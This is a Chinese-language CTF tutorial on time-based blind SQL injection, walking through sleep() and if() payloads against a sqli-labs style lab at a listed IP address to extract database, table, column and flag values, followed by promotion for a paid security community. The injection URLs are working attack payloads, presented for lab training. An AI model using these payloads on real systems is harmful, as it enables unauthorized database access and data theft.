

sql注入之sleep注入

一、免责声明

该课程中涉及的技术只适合于CTF比赛和有合法授权的渗透测试。请勿用于其他非法用途，如果作于其他非法用途，与本文作者无关。

二、原理

sleep注入又称基于时间的盲注。当网站页面上没有任何显示位，也没有输出sql语句执行错误信息。此时我们可以尝试采用sleep注入。

sleep注入需要注入的一点是，正常sql注入和错误的sql语句返回的页面都一样。但是加入了sleep(5)后页面的返回速度明显慢了五秒。

三、靶机地址

<http://39.98.88.18:8080/sql/Less-9/index.php?id=1>

四、函数介绍

1.sleep()函数

sleep()函数可以让函数停留n秒时间，然后返回0。如果程序被打断,则返回1。

在一般情况下，sleep()函数的返回值恒为0，因此我们便可以利用sleep(n)=0的永真性来执行sql注入。

```
1 row in set (1.00 sec)

Python
mysql> select sleep(10);
+-----+
| sleep(10) |
+-----+
| 0          |
+-----+
1 row in set (10.00 sec)
```

执行上述语句的时候，会有一个时间的停顿。希望大家自己尝试一下。

2.if函数

if函数的表达式如下：

if(表达式1,表达式2,表达式3)

如果表达式1是true，则返回表达式2；否则返回表达式3。

五、实战

因为此关注入成功的判断都是延迟五秒返回界面。故在此不在截图。

1.判断注入类型以及闭合方式

我们按照以前的方法在后面添加单引号，and 1=1等因此尝试，发现页面无变化。因此我们尝试如下链接

```
http://39.98.88.18:8080/sql/Less-9/?id=1' and if(1=0,1, sleep(10)) --+
```

此时发现过了将近10s后页面正常返回。单引号闭合成功。

2.猜数据库

首先我们来判断一下数据库的长度

```
http://39.98.88.18:8080/sql/Less-9/?id=1' and if(length(database())=8,sleep(10),1)--+
```

我们可以发现，当length(database())为其他致时，页面会立刻返回。因为此时length(database())值为假，if函数返回1。所以页面会可以返回。

接下来我们继续猜测数据库名称

```
http://39.98.88.18:8080/sql/Less-9/?id=1' and If(ascii(substr(database(),1,1))=115,sleep(10),1)--+
```

此时，网站延时成功，根据我们上节课中给出的ascii码表。我们可以查出115对应的单词为s。

由于sleep注入sql语句错误时，不会有错误页面。即我们也无法使用二分法进行判断。因此我们需要逐位逐位的去常识。所以手工测试比较繁琐。

subsrt函数第二位表示截取位数，我们可以通过修改它的值，来判断后面的位置链接如下：

```
http://39.98.88.18:8080/sql/Less-9/?id=1' and If(ascii(substr(database(),2,1))=100,sleep(10),1)--+
```

然后依次判断其他位数，再次不在详细叙述。

3.判断表名

首先我们来判断一下seucrity各个数据表的长度。

```
http://39.98.88.18:8080/sql/Less-5/?id=1'and If(length((select table_name from information_schema.tables where table_schema='security' limit 1,1))=5,sleep(10),1)--+
```

然后依次判断表名称中的每个字符

```
http://39.98.88.18:8080/sql/Less-5/?id=1'and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 3,1),1,1))=117,sleep(10),1)--+
```

通过上面的判断我们可以的得出存在flag这个表。

4.判段flag表中的列。

判断flag表中列的长度

```
http://39.98.88.18:8080/sql/Less-5/?id=1'and If(length((select column_name from
```

```
information_schema.columns where table_schema='security' and table_name='flag' limit  
1,1))=4,sleep(10),1)--+
```

可以判断长度为4位，然后判断列名

```
http://39.98.88.18:8080/sql/Less-5/?id=1'and If(ascii(substr((select column_name from  
information_schema.columns where table_schema='security' and table_name='flag' limit  
1,1),1,1))=117,sleep(10),1)--+
```

然后通过substr和limit参数来修改剩余各位。

5.判断内容

```
http://39.98.88.18:8080/sql/Less-5/?id=1'and If(length((select flag from security.flag limit  
0,1))=4,sleep(10),1)--+
```

六、sqlmap

因sql布尔型注入需要对猜解的字符进行逐个尝试，过程相对繁琐。故本人还是推荐使用sqlmap。

关于sqlmap使用，本节课程跟上节课程相同。故在此不做叙述。

七、赛题实战

如有问题，可以随时在知识星球内@江江河畔砍柴人

赛题地址: <https://t.zsxq.com/6AUzBaY>

八、小结

CTF（web和内网渗透系列教程）的清单请在“<https://github.com/xuanhun/HackingResource>”查看，定时更新最新章节链接

答疑、辅导请加入玄魂工作室--安全圈，一起成长探讨更私密内容。微信扫码了解详情：





星主：程序员－玄魂

星球：玄魂工作室-安全圈



 知识星球

长按扫码预览社群内容
和星主关系更进一步

及时获取更多消息，请关注微信订阅号

